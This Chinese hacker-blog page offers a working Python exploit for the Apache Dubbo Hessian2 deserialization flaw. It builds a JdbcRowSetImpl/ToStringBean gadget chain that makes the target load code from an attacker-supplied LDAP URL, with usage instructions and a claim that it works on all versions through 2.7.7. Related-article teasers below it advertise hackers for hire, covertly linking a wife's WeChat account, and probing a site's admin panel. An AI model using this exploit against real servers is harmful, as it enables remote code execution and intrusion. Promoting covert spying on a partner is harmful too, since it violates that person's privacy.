Apache Dubbo反序列化漏洞

访客4年前黑客文章840
# -*- coding: utf-8 -*-importsys fromdubbo.codec.hessian2 importDecoder,new_object fromdubbo.client importDubboClient iflen(sys.argv)<4:print('Usage: python {} DUBBO_HOST DUBBO_PORT LDAP_URL'.format(sys.argv[0]))print(' Example: - python {} 1.1.1.1 12345 ldap://1.1.1.6:80/exp'.format(sys.argv[0]))sys.exit()client =DubboClient(sys.argv[1],int(sys.argv[2]))JdbcRowSetImpl=new_object('com.sun.rowset.JdbcRowSetImpl',dataSource=sys.argv[3],strMatchColumns=["foo"])JdbcRowSetImplClass=new_object('java.lang.Class',name="com.sun.rowset.JdbcRowSetImpl",)toStringBean=new_object('com.rometools.rome.feed.impl.ToStringBean',beanClass=JdbcRowSetImplClass,obj=JdbcRowSetImpl )resp =client.send_request_and_return_response(service_name='org.apache.dubbo.spring.boot.sample.consumer.DemoService',# 此处可以是 $invoke、$invokeSync、$echo 等,通杀 2.7.7 及 CVE 公布的所有版本。method_name='$invoke',args=[toStringBean])output =str(resp)if'Fail to decode request due to: RpcInvocation'inoutput:print('[!] Target maybe not support deserialization.')elif'EXCEPTION: Could not complete class com.sun.rowset.JdbcRowSetImpl.toString()'inoutput:print('[+] Succeed.')else:print('[!] Output:')print(output)print('[!] Target maybe not use dubbo-remoting library.')

相关文章

杨妈火锅挣钱吗?加盟优势多利润丰厚

杨妈火锅挣钱吗?加盟优势多利润丰厚

随着冬天的临近,火锅市场开始异常的火爆,很多投资商都看到其中商机,作为创业的目标。杨妈火锅加盟从行业中脱颖而出,因其独特的口味和新奇的经营理念,打破了传统火锅,吸引到众多的加盟商。杨妈火锅加盟经过多年...

腾讯文档中的word文档怎么快速清除格式,腾讯文档教程

近日有一些小伙伴们资询我有关腾讯文档中的word文本文档怎么快速清除格式呢?下边就为大伙儿产生了腾讯文档中的word文本文档迅速清除格式的具体做法,有必须的小伙伴们能够来掌握掌握哦。       近日...

那里能找到黑客妙手协助,阿里巴巴最牛黑客是谁

一、那边能寻找妙手帮助网络黑客接单子步骤 1、找黑客方法幻影对Win9XWintwin的漏洞能够检测到,它早已变成很多网络黑客必需的专用工具之一,一些高級网络黑客也喜爱它。那边能寻找妙手帮助阿里巴巴网...

黑客接单入侵_网贷找黑客

45 days ago, during 24×7 monitoring, #ManagedDefense detected & contained an attempted intrusion...

怎样偷偷关联老婆微信&amp;mdash;2个微信号怎么关联?

“我一直相信夫妻应当互相信赖,互相认同,给对方充足的空间,所以我从不检验妻子的手机,无条件地认为她。尽管她和单位里面比她大四五岁的男同事关系很糟糕,但我还是选取无条件地信赖她。只是一个一般的朋友。 怎...

删除好友后怎么恢复聊天记录(微信误删聊天记

昨晚在群里遛狗 一朋友突然发了个卖信封的骗子站。当时还没吃饭 也无聊就抄上家伙 跟我朋友一起 给他检查检查。 看图。这家伙估计骗了不少人,百度一下QQ见不少人刷他是骗子。主站找到后台 尝试弱口令。无果...